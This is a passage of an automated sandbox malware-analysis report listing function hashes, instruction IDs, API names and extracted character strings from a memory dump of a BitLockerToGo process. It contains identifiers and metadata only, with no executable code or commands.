                                          • Opcode Fuzzy Hash: 7805861dcd186361dfe2ebe0cbac01867076507d20abb4575bc8bd1e16d54128
                                          • Instruction Fuzzy Hash: 17C14DB29487418FC360CF68DC867ABB7F1BF85318F08492DD1DAC6242EB78A155CB46
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 300bb9d8bd687b18680fba4ab17ea82e958c5c3b943d6f983d0f9339f81959a3
                                          • Instruction ID: 0489f4097319a4f04dc4b8a88ea320a20034b03f683308554657c2efb4d4bd08
                                          • Opcode Fuzzy Hash: 300bb9d8bd687b18680fba4ab17ea82e958c5c3b943d6f983d0f9339f81959a3
                                          • Instruction Fuzzy Hash: 76B1817558A380DBF631A7149944FEFB6F6BFC5304F08092CE48A57282DB769506CB63
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb590839b0da402e2421349866ffca18f9618a949301a0a30729d0efe936202a
                                          • Instruction ID: 16df2c756ec9d446266dbf817e577db8d112e165e8ed41cf4644ec039ad6b592
                                          • Opcode Fuzzy Hash: fb590839b0da402e2421349866ffca18f9618a949301a0a30729d0efe936202a
                                          • Instruction Fuzzy Hash: 9781E1719083419FD724CF68C490B5BBBE2AF95314F148A6DF5D98B292EB39C809CF52
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 838603de208fba0b4e26be5c295e699aa4010e5af8054041a69bee02f682f0f7
                                          • Instruction ID: 8255d03dee558827db3ca728eac4b6c334d22bf96dbc96e70fa87469fca3d883
                                          • Opcode Fuzzy Hash: 838603de208fba0b4e26be5c295e699aa4010e5af8054041a69bee02f682f0f7
                                          • Instruction Fuzzy Hash: 4F71E271A083409FD710CF28C880B2EBBE6EFC5314F59899CE9D9872A5E731E855CB42
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aab225d0c12a00bae6f375b133aaa906a6f94bc17dd4e9fcb95de3c5d1f12076
                                          • Instruction ID: 202d934bdff4a519845c9610d97715b23f42af049617466e97f036b53c1b9f86
                                          • Opcode Fuzzy Hash: aab225d0c12a00bae6f375b133aaa906a6f94bc17dd4e9fcb95de3c5d1f12076
                                          • Instruction Fuzzy Hash: 37619775A18201CFD710CF58E4A0A2EF7F5FB8A355F5A88A8E595A3701C338E864CF91
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f367f8f5ecc45097846795fd34e8c8963d6acf5eabfc43f7f435ff06ce4ba9ef
                                          • Instruction ID: 986dd682ba7af85b4f996ff1e577fe72647e7f04def6e93b7dbe7ca75d32881d
                                          • Opcode Fuzzy Hash: f367f8f5ecc45097846795fd34e8c8963d6acf5eabfc43f7f435ff06ce4ba9ef
                                          • Instruction Fuzzy Hash: 315137B16087548FE314DF69D89435BBBE1FB88318F144A2DE4E987390E379D6088B82
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 86ef1220d2833add138854a2f345cf4d7a6040ab97bf7108732bf7eaf43658bd
                                          • Instruction ID: 2a521899ec6b326842250d106f59c7b3c26b15c7e86cec87ca110614e1926eba
                                          • Opcode Fuzzy Hash: 86ef1220d2833add138854a2f345cf4d7a6040ab97bf7108732bf7eaf43658bd
                                          • Instruction Fuzzy Hash: AD51A174A082109FD725DF54D980A2BBBF6EF95348F5488ACE8C987351D731EC24CB62
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15cbd8248b4e6de2cb465da1b1765bb0527116926e0dc8f746f54a456c0f8a80
                                          • Instruction ID: c14c634d13678386b53945a881293414806583b3df2de40c15b35f1afc892c19
                                          • Opcode Fuzzy Hash: 15cbd8248b4e6de2cb465da1b1765bb0527116926e0dc8f746f54a456c0f8a80
                                          • Instruction Fuzzy Hash: E2518075E04210DFC724DF68C88092AB7E2FF85324F954A6DE85A8B351EB31EC41CB92
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c0fc7a28a755c2bc98263508083291689bf166f84fef1900ce7fec599393d18b
                                          • Instruction ID: 1c85ffc053a105fcead5800dfc4e60437f16c8f023b468a4c158273278f75787
                                          • Opcode Fuzzy Hash: c0fc7a28a755c2bc98263508083291689bf166f84fef1900ce7fec599393d18b
                                          • Instruction Fuzzy Hash: 5741467260C3940FD718DE3A8C9426A7BD2ABC5210F09C63EF0E6863C4EB74C61AD751
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42f63f5b27a259685f7f8d557ded40a6030a76d4eabddaae729d79b9d19835df
                                          • Instruction ID: 738012a2f6ba5a62a9bda726a21cdd85a76de7b384542c9083bbd926cffbc8f1
                                          • Opcode Fuzzy Hash: 42f63f5b27a259685f7f8d557ded40a6030a76d4eabddaae729d79b9d19835df
                                          • Instruction Fuzzy Hash: 38315C74A09344EBC700AF28E594A6EF7F5FB86605F498C6DE8C883201D335D854CB56
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 526342539c8c1ada43a5fc3033673f8f3cf8b6f81b828a329b9df3a1e0906718
                                          • Instruction ID: 5ea9e56840b089f3f37aa5e2bff4a4b5ccf67e7e89cfdd72fd63917a29fce239
                                          • Opcode Fuzzy Hash: 526342539c8c1ada43a5fc3033673f8f3cf8b6f81b828a329b9df3a1e0906718
                                          • Instruction Fuzzy Hash: 8A11E737F6462507E350CE7AE8C8A166356EBCA51970A0938EA82D7302CF22E412C150
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                          • Instruction ID: e40ec64b759febc54ec4c38bc40d630f0a9acf74de41654fcc8c860fc7d3e226
                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                          • Instruction Fuzzy Hash: 4511C233A055D40EC3178D3D8880565BFA34BD3978F5983D9E4B89B2D3D622898AC355
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: edad381a871012efd74b712fea6fb40d70a2cd9c39da1291d7c245a79cfd1e26
                                          • Instruction ID: 65ba44f55b2e9958b742cf61d952ecfe1d6eb9b7fa89a3a083cf14c498bf4b23
                                          • Opcode Fuzzy Hash: edad381a871012efd74b712fea6fb40d70a2cd9c39da1291d7c245a79cfd1e26
                                          • Instruction Fuzzy Hash: 6801D8F66003015BDB309F9895C0727F2AB7F81718F18542CEA09D7781EF79E805CAA1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e2b6f0e511fb73899bc6972f018fc161d1dfffd9b36224ce90d68ed8c49f1a4
                                          • Instruction ID: 77f8a6698eaa91583e8f5a851f502730e45d70e5d1195ffd16e80e0cab008768
                                          • Opcode Fuzzy Hash: 1e2b6f0e511fb73899bc6972f018fc161d1dfffd9b36224ce90d68ed8c49f1a4
                                          • Instruction Fuzzy Hash: 054198B406D7809FD6609F06A58425EBFF1BBC6784F60AE0CE2E92A728D774C541CF46
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 514589fca501f5db6df89bfef13271a11ef244346181a24e6bf76f9ce65de1e7
                                          • Instruction ID: 78825f111edc86af0affd4cb454cafdfa22d0f526e15b5041a8f96c911716b77
                                          • Opcode Fuzzy Hash: 514589fca501f5db6df89bfef13271a11ef244346181a24e6bf76f9ce65de1e7
                                          • Instruction Fuzzy Hash: 65F0ECB26043216BDF228A599CC0F77BB9CCB87314F191416E84657102D5715446C3E7
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
                                          • Instruction ID: 3624b77682ee83a1f7280ae798aa6870ad43fab9d5b934cbcd3197c76f6b32a4
                                          • Opcode Fuzzy Hash: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
                                          • Instruction Fuzzy Hash: 76E0C237B0522106A774CE369C01677F3E2EBC7715F4D946EE042D3248D638C4418265
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 02d03400e498563c15c714fa933aa6afe5943d8bcc04bde2d60de6fa899b2527
                                          • Instruction ID: e3cd3bf4dd3d1fbdb95ad773ceece18b70b04994eb72a1cfe3100c836007d183
                                          • Opcode Fuzzy Hash: 02d03400e498563c15c714fa933aa6afe5943d8bcc04bde2d60de6fa899b2527
                                          • Instruction Fuzzy Hash: 92C08CB4C88240D6E0205D10BB01675F1336307229F003820900E63502E922D924C947
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f87c2e4f126df2fdbd24c20231aec4d8355c217aadb62736c58c656dbff13557
                                          • Instruction ID: 54ed94e27e915e40f980d93898f085abe86cf83a5f34ba0b3326566f41817cf0
                                          • Opcode Fuzzy Hash: f87c2e4f126df2fdbd24c20231aec4d8355c217aadb62736c58c656dbff13557
                                          • Instruction Fuzzy Hash: 48C08C30864708E6CB20BF08C0412F1F330B7463B4F10E324E828670C59B38EA1CCA9D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bab845459ee24d071e55200cd74edd0c4b073df04110eef9137b2048b30c0a71
                                          • Instruction ID: c7c133324a08e5061819812458b53548a9a6c8dfc583b8fdfa187c38d60fd565
                                          • Opcode Fuzzy Hash: bab845459ee24d071e55200cd74edd0c4b073df04110eef9137b2048b30c0a71
                                          • Instruction Fuzzy Hash: 38B00230C89711FB82271F28A9084ADB6B5AA17292B413C94E405639008F3896A58A5E
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: AllocString
                                          • String ID: $!$#$$$%$'$)$*$+$,$-$/$0$1$3$5$7$9$;$=$?$@$B$K$L$S$T$U$V$W$[$[$_$c$f$h$u$y$}$~
                                          • API String ID: 2525500382-2477640369
                                          • Opcode ID: d5a75efd2dc169184571153fcfd9ddb74288f5d9ecaaa2ae70cb881388fa3589
                                          • Instruction ID: b68149b60a207797d3c48470974554dd84e69e2f739f163e1ee47f18d5bbe277
                                          • Opcode Fuzzy Hash: d5a75efd2dc169184571153fcfd9ddb74288f5d9ecaaa2ae70cb881388fa3589
                                          • Instruction Fuzzy Hash: 9A91956050D7C1CEE332DB288458B9BBFD16BA6318F084E9DD0ED5B292D7B64549CB23
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit
                                          • String ID: *$-$1$3$5$5$7$7$9$=$=$A$C$D$E$E$G$I$K$K$M$O$S$^$_
                                          • API String ID: 2610073882-3575756633
                                          • Opcode ID: f30d9adc572bf93b857df2eabf1bd34a2aaaa3ce1eb7878ee178d4101e735c9d
                                          • Instruction ID: 165dcce4941ad726c1ac15ee038eafdbdb85ee7714c5b331fb68e25172a593c7
                                          • Opcode Fuzzy Hash: f30d9adc572bf93b857df2eabf1bd34a2aaaa3ce1eb7878ee178d4101e735c9d
                                          • Instruction Fuzzy Hash: B041A4601087C0CEE716DF29C598716BFE1AF66308F08889DC9994F387C7B9D919CB66
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: InitVariant
                                          • String ID: *$-$1$3$5$5$7$7$9$=$=$A$C$D$E$E$G$I$K$K$M$O$S$^$_
                                          • API String ID: 1927566239-3575756633
                                          • Opcode ID: ecdd333bae522058192abd73e0f03526e8033d8dea23fdf8fbab8ca663e39f8c
                                          • Instruction ID: 93310661f0628e85fd2732d56bef688e112e4993edba76cd57dc5915ca1f3d02
                                          • Opcode Fuzzy Hash: ecdd333bae522058192abd73e0f03526e8033d8dea23fdf8fbab8ca663e39f8c
                                          • Instruction Fuzzy Hash: CA4195601087C0CEE716CF29C498716BFE16B26318F1884CDD9994F397C3BAD959CB66
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit
                                          • String ID: A$C$E$F$G$Q$S$U$W$Y$[$]$_$i$k$m$o
                                          • API String ID: 2610073882-1723352897
                                          • Opcode ID: e0996bea8c7e0d7df3e5fe57a4e381cc60a62fbc41b91ff03c5b05436e2610c4
                                          • Instruction ID: a0f7b250111f8941a713285fbd50abdd2bb3aea6cd7cbd182a0b2af7e8a5891b
                                          • Opcode Fuzzy Hash: e0996bea8c7e0d7df3e5fe57a4e381cc60a62fbc41b91ff03c5b05436e2610c4
                                          • Instruction Fuzzy Hash: 7141C360108BC1CED7269F289888706BFA1AB56214F088ADDD8EA4F3DBC375D515CB62
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit
                                          • String ID: A$C$E$F$G$Q$S$U$W$Y$[$]$_$i$k$m$o
                                          • API String ID: 2610073882-1723352897
                                          • Opcode ID: c1eae18f59ac4ffee0ea77bb963797135055c0218482eb278a7064780f6e9abf
                                          • Instruction ID: 1354da45d56182dd7aaae81e022d6082ecd418fd7726048ff478100b695e18e7
                                          • Opcode Fuzzy Hash: c1eae18f59ac4ffee0ea77bb963797135055c0218482eb278a7064780f6e9abf
                                          • Instruction Fuzzy Hash: 1F41C560108BC1CED726CF2C85C8706BFA16B66225F088ADDD8E94F7DBC365D515CB62
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit
                                          • String ID: #$#$)$0$0$6$=$=$L
                                          • API String ID: 2610073882-2885410951
                                          • Opcode ID: e8b5f52624343379c492a6fc9385538e777372e2bdadf5104d74c467a61b1a26
                                          • Instruction ID: e6c796c08b47551d85595abef25ae09c26b71aca9d2955e0b8c4ee7d14c5f50a
                                          • Opcode Fuzzy Hash: e8b5f52624343379c492a6fc9385538e777372e2bdadf5104d74c467a61b1a26
                                          • Instruction Fuzzy Hash: 5041D27040CBC18ED322DB78845875AFFE0ABA6324F184E9DE5E48B3A2C7749509CB53
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: InitVariant
                                          • String ID: #$#$2$5$9
                                          • API String ID: 1927566239-987578143
                                          • Opcode ID: 51112f11b14b14a11f7f385de551d7c124f820d03dde6b65e91e96f5c3476552
                                          • Instruction ID: c98428de7e5d0e44945b101ec20e5adaf06da38380c28d65c77731b3a942cca7
                                          • Opcode Fuzzy Hash: 51112f11b14b14a11f7f385de551d7c124f820d03dde6b65e91e96f5c3476552
                                          • Instruction Fuzzy Hash: 1F41D37000C3C19ED362DB28848874EBFE0AB9A328F484A8DF4E44B3D2C7B48549CB57
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: InitVariant
                                          • String ID: #$#$2$5$9
                                          • API String ID: 1927566239-987578143
                                          • Opcode ID: 86081f0fd822470466c7f33cc73713d8fdc4e182d2e75907648c8bb52c348d09
                                          • Instruction ID: acdedcfb3cf164ae22e4cbdea0dadb1d4cf96f23520840799990acafbbb2bce9
                                          • Opcode Fuzzy Hash: 86081f0fd822470466c7f33cc73713d8fdc4e182d2e75907648c8bb52c348d09
                                          • Instruction Fuzzy Hash: 7841A47000C7C19ED362DB28848875EBFE16B96268F485E8DF0E45B3E2C7758545CB57